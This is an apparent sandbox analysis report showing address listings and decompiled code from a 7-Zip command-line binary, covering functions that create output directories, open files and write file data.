0x00412a3e
0x00412a47
0x00412a4c
0x00412a4e
0x00412aea
0x00412aed
0x00412b5c
0x00412b63
0x00412b6b
0x00412b6f
0x00412b71
0x00000000
0x00412b71
0x00412aef
0x00412b00
0x00412b03
0x00412b05
0x00412b08
0x00000000
0x00000000
0x00412b0a
0x00412b0c
0x00412b10
0x00412b15
0x00412b15
0x00412b1b
0x00412b23
0x00412b29
0x00412b34
0x00412b38
0x00412b40
0x00412b44
0x00412b49
0x00412a54
0x00412a60
0x00412a65
0x00412a6b
0x00412a72
0x00412a75
0x00412a78
0x00412a7a
0x00412a7c
0x00412ab4
0x00412ab9
0x00412abc
0x00412ac0
0x00412ac5
0x00412ac5
0x00412acb
0x00412ad3
0x00412ad9
0x00412ae1
0x00412686
0x00412689
0x00412691
0x00412695
0x00000000
0x00412695
0x00412a7e
0x00412a83
0x00412a86
0x00412a8a
0x00412a8f
0x00412a8f
0x00412a95
0x00412a9d
0x00412aa3
0x00412aab
0x004129c7
0x004129ca
0x004129d2
0x004129d6
0x004129db
0x004129db
0x00000000
0x00412a4e
0x00412488
0x0041248d
0x00412496
0x0041249a
0x0041249f
0x004124a1
0x00412918
0x0041291b
0x0041291f
0x00000000
0x00412924
0x004124aa
0x004124aa
0x004124ac
0x00412503
0x00412505
0x00412513
0x00412532
0x00412534
0x00412536
0x0041257c
0x0041257c
0x0041257e
0x004126a6
0x004126a6
0x004126ab
0x004126ab
0x004126ae
0x004126b1
0x00412761
0x00412764
0x00412955
0x0041295a
0x0041295c
0x00000000
0x00000000
0x00412967
0x00412975
0x00412979
0x00412981
0x00412985
0x0041298a
0x00412994
0x00412997
0x0041299a
0x0041299c
0x0041299e
0x004129e2
0x004129ea
0x004129f2
0x004129fa
0x00412a02
0x00412a05
0x00000000
0x00412a05
0x004129a0
0x004129a8
0x004129b0
0x004129b8
0x004129c0
0x004129c3
0x00000000
0x004129c3
0x00412771
0x00412779
0x0041277d
0x00412782
0x00412784
0x00412823
0x00412828
0x0041282a
0x00412912
0x00000000
0x00412917
0x00412839
0x00412847
0x0041284b
0x00412853
0x00412857
0x0041285c
0x00412866
0x00412869
0x0041286c
0x0041286e
0x00412870
0x004128b7
0x004128bf
0x004128c7
0x004128cf
0x004128d7
0x004128df
0x004128e2
0x004128e6
0x004128e9
0x004128f1
0x004128f5
0x004128fa
0x004128fa
0x004128ff
0x00412902
0x00412908
0x00000000
0x00412908
0x00412872
0x0041287a
0x00412882
0x0041288a
0x00412892
0x0041289a
0x0041289d
0x004128a1
0x004128a4
0x004128ac
0x004128b0
0x00000000
0x004128b0
0x0041278a
0x00412797
0x0041279c
0x004127a2
0x004127a9
0x004127ac
0x004127af
0x004127b1
0x004127b3
0x004127e9
0x004127f1
0x004127f9
0x00412801
0x00412809
0x00412811
0x00412814
0x00000000
0x00412814
0x004127b5
0x004127bd
0x004127c5
0x004127cd
0x004127d5
0x004127dd
0x004127e0
0x00000000
0x004127e0
0x004126ba
0x004126bf
0x004126c1
0x00000000
0x00000000
0x004126d0
0x004126de
0x004126e2
0x004126ea
0x004126ee
0x004126f3
0x004126fd
0x00412700
0x00412703
0x00412705
0x00412707
0x00412735
0x0041273d
0x00412745
0x0041274d
0x00412755
0x00412758
0x00000000
0x00412758
0x00412709
0x00412711
0x00412719
0x00412721
0x00412729
0x0041272c
0x00000000
0x0041272c
0x00412584
0x00412584
0x00412585
0x0041269f
0x00000000
0x0041269f
0x0041258b
0x0041258b
0x0041258c
0x00412663
0x0041266b
0x00412673
0x0041267b
0x00412682
0x00000000
0x00412682
0x00412592
0x00412592
0x00412593
0x00412634
0x0041263b
0x00412643
0x0041264b
0x00412653
0x0041265a
0x00000000
0x0041265a
0x00412599
0x00412599
0x0041259a
0x00412628
0x00000000
0x00412628
0x004125a0
0x004125a3
0x004125a4
0x004125e7
0x004125ef
0x004125f7
0x004125ff
0x00412609
0x0041260d
0x00412615
0x00412619
0x0041261e
0x00000000
0x0041261e
0x004125a6
0x004125ae
0x004125b6
0x004125be
0x004125c5
0x00000000
0x004125c5
0x0041253b
0x00412543
0x0041254b
0x00412553
0x0041255d
0x00412561
0x00412569
0x0041256d
0x00412572
0x00000000
0x00412572
0x004124af
0x004124b0
0x00000000
0x00000000
0x004124b9
0x004124c1
0x004124c9
0x004124d1
0x004124d7
0x004124db
0x004124e3
0x004124e7
0x00000000
0x004124e7
0x00412444
0x0041244d
0x00412452
0x00412455
0x00412459
0x00412459
0x00412461
0x00412469
0x0041246f
0x00412473
0x00000000
0x00412473
0x00412382
0x00412388
0x0041239b
0x0041239b
0x0041239e
0x00000000
0x00000000
0x004123a9
0x004123ac
0x004123af
0x004123b2
0x004123bc
0x004123c1
0x004123c5
0x004123ca
0x004123d0
0x0041241c
0x0041241f
0x00412423
0x00000000
0x00412428
0x004123d2
0x004123d5
0x004123e1
0x004123e1
0x004123e4
0x004123e7
0x004123ee
0x004123ee
0x004123e9
0x004123e9
0x004123e9
0x004123f0
0x004123f0
0x004123f3
0x004123ff
0x004123ff
0x004123ff
0x00412401
0x00412401
0x00412404
0x00412410
0x00412410
0x00412410
0x00412412
0x00412417
0x00000000
0x00412417
0x00412406
0x00412409
0x00000000
0x00000000
0x0041240b
0x00000000
0x0041240b
0x004123f5
0x004123f8
0x00000000
0x00000000
0x004123fa
0x00000000
0x004123fa
0x004123d7
0x004123da
0x00000000
0x00000000
0x004123dc
0x00000000
0x004123dc
0x0041238a
0x0041238d
0x00000000
0x00000000
0x00412396
0x00000000
0x00412396
0x0041230f
0x00412312
0x00000000
0x00412312
0x004122f9
0x004122fa
0x004122fd
0x004122fd
0x00000000
0x004122fa
0x004122e4
0x004122e7
0x00000000
0x004122e7
0x0041222c
0x00412230
0x00000000
0x00412230
0x00412214
0x00412218
0x00000000
0x00412218
0x004121c1
0x004121c3
0x004121c8
0x004121cb
0x004121da
0x004121da
0x004121cd
0x004121cd
0x004121d0
0x004121d6
0x004121d6
0x004121dc
0x004121de
0x004121e3
0x004121e3
0x004121e9
0x00000000
0x004121e9
0x00412189
0x00412197
0x0041219c
0x0041219e
0x00000000
0x00000000
0x00000000
0x0041219e
0x00412127
0x0041212c
0x00412142
0x00412146
0x0041214c
0x00000000
0x0041214c
0x00412131
0x00412135
0x00000000
0x00412135
0x00412110
0x00412114
0x00412119
0x00000000
0x00412119
0x004120c3
0x004120c3
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0041202C

Strings

59@, xrefs: 004122C6, 0041233E, 00412351, 00412553, 004125BE, 004125FF, 00412653, 0041267B, 004126A6, 00412AA3, 00412AD9, 00412B29, 00412B71
can not open output file , xrefs: 00412A57
,, xrefs: 00412C27

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: ,$59@$can not open output file
API String ID: 3519838083-2797906540
Opcode ID: a83944683b8da85deb860ed7ac8c2a38f00ab0faa09fc1eaa5330bdfff491946
Instruction ID: cf4575037a337767e5e75bbbc8f08648ffbb7fd2cc7ee605cc239c560f10ba1b
Opcode Fuzzy Hash: a83944683b8da85deb860ed7ac8c2a38f00ab0faa09fc1eaa5330bdfff491946
Instruction Fuzzy Hash: 7682CD30D04248EFDF11EFA4DA40ADDBBB0AF54308F14446EE045B7292DB796E58DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00416922 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00416922(intOrPtr __ecx, signed int __edx, void* __eflags) {
				intOrPtr* _t123;
				void* _t130;
				signed int _t144;
				signed int _t153;
				signed int _t156;
				intOrPtr _t158;
				signed int _t160;
				void* _t162;
				void* _t163;
				signed int _t169;
				signed int _t175;
				signed int _t180;
				signed int _t185;
				intOrPtr _t198;
				intOrPtr* _t208;
				signed int* _t227;
				intOrPtr* _t231;
				signed int* _t234;
				void* _t235;
				signed int _t236;
				void* _t238;

				E0046B890(E00474B3C, _t238);
				_t123 =  *((intOrPtr*)(_t238 + 0x20));
				_t185 = 0;
				 *_t123 = 0;
				 *((intOrPtr*)(_t123 + 4)) = 0;
				_t231 =  *((intOrPtr*)(__ecx));
				 *((intOrPtr*)(_t238 - 0x14)) = __ecx;
				 *(_t238 - 0x1c) = __edx;
				E00404AD0(_t238 - 0x58, 4);
				 *((intOrPtr*)(_t238 - 0x58)) = 0x47ab80;
				_t234 =  *(_t238 + 0x10);
				 *(_t238 - 4) = 0;
				if( *_t234 != 0) {
					L13:
					E00404AD0(_t238 - 0x6c, 4);
					 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
					 *(_t238 - 4) = 2;
					E004039C0(_t238 - 0x34,  &(_t234[4]));
					 *(_t238 - 4) = 3;
					E00403532(_t238 - 0x28, 0x48bb7c);
					 *(_t238 - 4) = 4;
					_t130 = E00417172(_t238 - 0x40,  *((intOrPtr*)(_t238 - 0x14)) + 0x10, __eflags);
					 *(_t238 - 4) = 5;
					E00416C31(_t238 - 0x34, _t238 - 0x28, _t130);
					E00407A18( *((intOrPtr*)(_t238 - 0x40)));
					 *(_t238 - 4) = 3;
					E00407A18( *(_t238 - 0x28));
					__eflags =  *((intOrPtr*)(_t238 - 0x30)) - _t185;
					if( *((intOrPtr*)(_t238 - 0x30)) == _t185) {
						L18:
						asm("sbb eax, eax");
						E00411C21( *((intOrPtr*)(_t238 + 0x18)),  ~( *_t234) &  *(_t238 - 0x1c),  *((intOrPtr*)(_t238 - 0x14)),  *((intOrPtr*)(_t238 + 0x14)), _t234[0], _t234[0], _t234[1], _t238 - 0x34, _t238 - 0x6c,  *((intOrPtr*)(_t238 + 8)),  *((intOrPtr*)(_t238 + 0xc)));
						_t227 =  &(_t234[7]);
						_t144 = E004192F5(_t231, _t227);
						__eflags = _t144 - _t185;
						 *(_t238 + 0x10) = _t144;
						if(_t144 == _t185) {
							__eflags = _t234[0] - _t185;
							if(_t234[0] == _t185) {
								L23:
								__eflags = 0;
							} else {
								__eflags = _t234[1] - _t185;
								if(_t234[1] != _t185) {
									goto L23;
								} else {
									_push(1);
									_pop(0);
								}
							}
							_push( *((intOrPtr*)(_t238 + 0x18)));
							__eflags =  *_t234 - _t185;
							_t198 =  *_t231;
							_push(0);
							if( *_t234 == _t185) {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231,  *((intOrPtr*)(_t238 - 0x4c)),  *((intOrPtr*)(_t238 - 0x50)));
							} else {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231, _t185, 0xffffffff);
								 *(_t238 - 0x44) = _t185;
								 *(_t238 - 0x42) = _t185;
								 *(_t238 - 4) = 0xa;
								_t156 =  *((intOrPtr*)( *_t231 + 0x20))(_t231, 0x2c, _t238 - 0x44);
								__eflags = _t156;
								if(_t156 == 0) {
									__eflags =  *(_t238 - 0x44) - 0x15;
									if( *(_t238 - 0x44) == 0x15) {
										L28:
										_t158 = E0040C5AD(_t238 - 0x44);
										_t208 =  *((intOrPtr*)(_t238 + 0x20));
										 *_t208 = _t158;
										 *(_t208 + 4) = _t227;
									} else {
										__eflags =  *(_t238 - 0x44) - 0x13;
										if( *(_t238 - 0x44) == 0x13) {
											goto L28;
										}
									}
								}
								 *(_t238 - 4) = 3;
								E0040C20F(_t238 - 0x44);
							}
							_t236 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x30))(_t235);
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 0xb;
						} else {
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							_t236 =  *(_t238 + 0x10);
							 *(_t238 - 4) = 9;
						}
					} else {
						_t160 = E00409D7C( *((intOrPtr*)(_t238 - 0x34))); // executed
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						} else {
							_t236 = GetLastError();
							__eflags = _t236 - _t185;
							if(_t236 == _t185) {
								_t236 = 0x80004005;
							}
							_t162 = E00403532(_t238 - 0x28, L"Can not create output directory ");
							_push(_t238 - 0x34);
							 *(_t238 - 4) = 6;
							_t163 = E0040B0A0(_t238 - 0x40, _t162);
							 *(_t238 - 4) = 7;
							E00401E26( *((intOrPtr*)(_t238 + 0x1c)), _t163);
							E00407A18( *((intOrPtr*)(_t238 - 0x40)));
							E00407A18( *(_t238 - 0x28));
							E00407A18( *((intOrPtr*)(_t238 - 0x34)));
							 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
							 *(_t238 - 4) = 8;
						}
					}
					E0040862D();
					 *(_t238 - 4) = _t185;
					E00408604(_t238 - 0x6c);
					goto L33;
				} else {
					_t169 =  *((intOrPtr*)( *_t231 + 0x14))(_t231, _t238 - 0x18);
					if(_t169 == 0) {
						__eflags =  *(_t238 - 0x18);
						 *((intOrPtr*)(_t238 - 0x10)) = 0;
						if( *(_t238 - 0x18) <= 0) {
							L9:
							__eflags =  *((intOrPtr*)(_t238 - 0x50)) - _t185;
							if( *((intOrPtr*)(_t238 - 0x50)) != _t185) {
								goto L13;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x2c))();
								goto L11;
							}
						} else {
							while(1) {
								 *(_t238 - 0x28) = _t185;
								 *(_t238 - 0x24) = _t185;
								 *(_t238 - 0x20) = _t185;
								E00401E9A(_t238 - 0x28, 3);
								_push(_t238 - 0x28);
								 *(_t238 - 4) = 1;
								_push( *((intOrPtr*)(_t238 - 0x10)));
								_t175 = E004179F7( *((intOrPtr*)(_t238 - 0x14)));
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								}
								_t175 = E004179E9(_t238 + 0x13);
								__eflags = _t175 - _t185;
								if(_t175 != _t185) {
									break;
								} else {
									__eflags =  *((intOrPtr*)(_t238 + 0x13)) - _t185;
									_t180 = E00408E6D( *((intOrPtr*)(_t238 + 0x13)) - _t185, _t238 - 0x28, _t175 & 0xffffff00 |  *((intOrPtr*)(_t238 + 0x13)) == _t185);
									__eflags = _t180;
									if(_t180 != 0) {
										E00415C6D(_t238 - 0x58,  *((intOrPtr*)(_t238 - 0x10)));
									}
									 *(_t238 - 4) = _t185;
									E00407A18( *(_t238 - 0x28));
									 *((intOrPtr*)(_t238 - 0x10)) =  *((intOrPtr*)(_t238 - 0x10)) + 1;
									__eflags =  *((intOrPtr*)(_t238 - 0x10)) -  *(_t238 - 0x18);
									if( *((intOrPtr*)(_t238 - 0x10)) <  *(_t238 - 0x18)) {
										continue;
									} else {
										goto L9;
									}
								}
								goto L34;
							}
							_t236 = _t175;
							E00407A18( *(_t238 - 0x28));
							L33:
							_t117 = _t238 - 4;
							 *_t117 =  *(_t238 - 4) | 0xffffffff;
							__eflags =  *_t117;
							E00408604(_t238 - 0x58);
							_t153 = _t236;
						}
					} else {
						_t185 = _t169;
						L11:
						 *(_t238 - 4) =  *(_t238 - 4) | 0xffffffff;
						E00408604(_t238 - 0x58);
						_t153 = _t185;
					}
				}
				L34:
				 *[fs:0x0] =  *((intOrPtr*)(_t238 - 0xc));
				return _t153;
			}

0x00416927
0x0041692f
0x00416933
0x00416936
0x00416939
0x0041693c
0x0041693e
0x00416941
0x00416949
0x0041694e
0x00416955
0x00416958
0x0041695d
0x00416a25
0x00416a2a
0x00416a2f
0x00416a3d
0x00416a41
0x00416a4e
0x00416a52
0x00416a5d
0x00416a64
0x00416a71
0x00416a75
0x00416a7d
0x00416a85
0x00416a89
0x00416a8e
0x00416a93
0x00416b09
0x00416b30
0x00416b36
0x00416b3b
0x00416b40
0x00416b45
0x00416b47
0x00416b4a
0x00416b68
0x00416b6b
0x00416b77
0x00416b77
0x00416b6d
0x00416b6d
0x00416b70
0x00000000
0x00416b72
0x00416b72
0x00416b74
0x00416b74
0x00416b70
0x00416b79
0x00416b7c
0x00416b7e
0x00416b80
0x00416b81
0x00416bde
0x00416b83
0x00416b8a
0x00416b8c
0x00416b90
0x00416b9d
0x00416ba1
0x00416ba4
0x00416ba6
0x00416ba8
0x00416bad
0x00416bb6
0x00416bb9
0x00416bbe
0x00416bc1
0x00416bc3
0x00416baf
0x00416baf
0x00416bb4
0x00000000
0x00000000
0x00416bb4
0x00416bad
0x00416bc9
0x00416bcd
0x00416bcd
0x00416be9
0x00416bee
0x00416bf4
0x00416bfb
0x00416b4c
0x00416b4f
0x00416b55
0x00416b5c
0x00416b5f
0x00416b5f
0x00416a95
0x00416a98
0x00416a9d
0x00416a9f
0x00000000
0x00416aa1
0x00416aa7
0x00416aa9
0x00416aab
0x00416aad
0x00416aad
0x00416aba
0x00416ac4
0x00416ac8
0x00416acc
0x00416ad5
0x00416ad9
0x00416ae1
0x00416ae9
0x00416af1
0x00416af9
0x00416b00
0x00416b00
0x00416a9f
0x00416c02
0x00416c0a
0x00416c0d
0x00000000
0x00416963
0x0041696a
0x0041696f
0x00416978
0x0041697b
0x0041697e
0x004169f5
0x004169f5
0x004169f8
0x00000000
0x004169fa
0x004169ff
0x00000000
0x004169ff
0x00416980
0x00416980
0x00416985
0x00416988
0x0041698b
0x0041698e
0x00416999
0x0041699a
0x0041699e
0x004169a1
0x004169a6
0x004169a8
0x00000000
0x00000000
0x004169b3
0x004169b8
0x004169ba
0x00000000
0x004169bc
0x004169bc
0x004169ca
0x004169cf
0x004169d1
0x004169d9
0x004169d9
0x004169e1
0x004169e4
0x004169e9
0x004169f0
0x004169f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004169f3
0x00000000
0x004169ba
0x00416a18
0x00416a1a
0x00416c12
0x00416c12
0x00416c12
0x00416c12
0x00416c19
0x00416c1e
0x00416c1e
0x00416971
0x00416971
0x00416a02
0x00416a02
0x00416a09
0x00416a0e
0x00416a0e
0x0041696f
0x00416c20
0x00416c26
0x00416c2e

APIs

__EH_prolog.LIBCMT ref: 00416927
GetLastError.KERNEL32(?,00000000,0048BB7C,?,00000004,00000004,?,00000000,00000000), ref: 00416AA1

Strings

59@, xrefs: 00416A2F, 00416AF9, 00416B15, 00416B55, 00416BF4
Can not create output directory , xrefs: 00416AB2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorH_prologLast
String ID: 59@$Can not create output directory
API String ID: 1057991267-3326608674
Opcode ID: aa03b1b9719480a613dd0779f5744a711ba90c60dd743b3e61de5665c96953ae
Instruction ID: 6de5a34db444ab3dab8a47dd72c1d742a8883a30c047269dba67d70d491f02d0
Opcode Fuzzy Hash: aa03b1b9719480a613dd0779f5744a711ba90c60dd743b3e61de5665c96953ae
Instruction Fuzzy Hash: E0A1C171D04249EFCF10EFA4C9419EEBBB4AF18308F14446EE455B7291DB38AE45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00470330 Relevance: 6.1, APIs: 4, Instructions: 135
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00470330(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x496460 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E004716C1(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E00470646())) = 0x1c;
								_t73 = E0047064F();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E004705D3(_a4);
						} else {
							 *((intOrPtr*)(E00470646())) = 9;
							_t73 = E0047064F();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0); // executed
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}

0x0047033c
0x00470341
0x00470344
0x00470347
0x00470356
0x00470368
0x0047036b
0x00470370
0x00470378
0x0047037d
0x00470382
0x00470384
0x00470388
0x0047045c
0x00470462
0x00470464
0x00470477
0x00470466
0x00470469
0x0047046c
0x0047046c
0x00470418
0x00470418
0x0047041b
0x0047041d
0x004704b3
0x004704b3
0x00000000
0x004704b3
0x00470423
0x00470426
0x0047048a
0x0047048a
0x0047048c
0x00470491
0x0047049f
0x004704a4
0x004704aa
0x004704af
0x00470485
0x00000000
0x00470485
0x00470496
0x00470499
0x00000000
0x00000000
0x00000000
0x00470499
0x0047042a
0x0047042b
0x0047042e
0x0047047f
0x00470430
0x00470435
0x0047043b
0x00470440
0x00470440
0x00000000
0x0047042e
0x00470391
0x00470394
0x00470397
0x0047039a
0x00000000
0x00000000
0x00000000
0x00000000
0x004703a0
0x004703a0
0x004703a0
0x004703a6
0x004703ac
0x004703af
0x00000000
0x00000000
0x004703b4
0x004703b7
0x004703b9
0x004703bc
0x004703be
0x004703c1
0x004703c4
0x004703c4
0x004703c4
0x004703c5
0x004703c7
0x004703d2
0x004703d2
0x004703e2
0x004703f7
0x004703fd
0x004703ff
0x0047044a
0x00000000
0x0047044a
0x00470401
0x00470404
0x00470407
0x00470409
0x00000000
0x00000000
0x00470411
0x00470411
0x00470416
0x00470416
0x00000000
0x00470416
0x00470349
0x00000000

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,?), ref: 004703F7

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
Instruction ID: f9a8e47d18844c341b85913162919efea3dfe28df8f23c4564b581e76a5f4db2
Opcode Fuzzy Hash: bd8b15df62944b5eaea57f4cf8cadc52d8797af58dbada8c92088e6b14acbd15
Instruction Fuzzy Hash: AE518D71901218EFCB11CF68C984ADE7BB4EF81340F10C5AAE91D9B251D738DA50CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8BF Relevance: 6.1, APIs: 4, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040B8BF(void** __ecx) {
				signed int _t37;
				void* _t38;
				signed int _t41;
				signed int _t45;
				intOrPtr* _t48;
				signed int _t50;
				void** _t74;
				void* _t76;
				intOrPtr _t81;

				E0046B890(E00473E14, _t76);
				_t81 =  *0x490a7c; // 0x1
				_t74 = __ecx;
				if(_t81 != 0) {
					_t37 = E0040B9C0(__ecx);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = CreateFileW( *(_t76 + 8),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0); // executed
						__eflags = _t38 - 0xffffffff;
						 *_t74 = _t38;
						if(_t38 == 0xffffffff) {
							 *(_t76 - 0x18) = 0;
							 *((intOrPtr*)(_t76 - 0x14)) = 0;
							 *((intOrPtr*)(_t76 - 0x10)) = 0;
							E00401E9A(_t76 - 0x18, 3);
							 *((intOrPtr*)(_t76 - 4)) = 2;
							_t41 = E0040B863(_t76 - 0x18);
							__eflags = _t41;
							if(_t41 != 0) {
								 *_t74 = CreateFileW( *(_t76 - 0x18),  *(_t76 + 0xc),  *(_t76 + 0x10), 0,  *(_t76 + 0x14),  *(_t76 + 0x18), 0);
							}
							E00407A18( *(_t76 - 0x18));
						}
						__eflags =  *_t74 - 0xffffffff;
						_t74[1] = 0;
						_t33 =  *_t74 != 0xffffffff;
						__eflags = _t33;
						_t37 = 0 | _t33;
					}
				} else {
					E00403532(_t76 - 0x24,  *(_t76 + 8));
					 *((intOrPtr*)(_t76 - 4)) = 0;
					_t45 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t45 + 1);
					_t48 = E0040822F(_t76 - 0x30);
					 *((char*)(_t76 - 4)) = 1;
					_t50 = E0040B882(_t74, _t81,  *_t48,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14),  *(_t76 + 0x18));
					E00407A18( *((intOrPtr*)(_t76 - 0x30)));
					E00407A18( *((intOrPtr*)(_t76 - 0x24)));
					_t37 = _t50;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t37;
			}

0x0040b8c4
0x0040b8cf
0x0040b8d6
0x0040b8d8
0x0040b933
0x0040b938
0x0040b93a
0x0040b954
0x0040b956
0x0040b959
0x0040b95b
0x0040b962
0x0040b965
0x0040b968
0x0040b96b
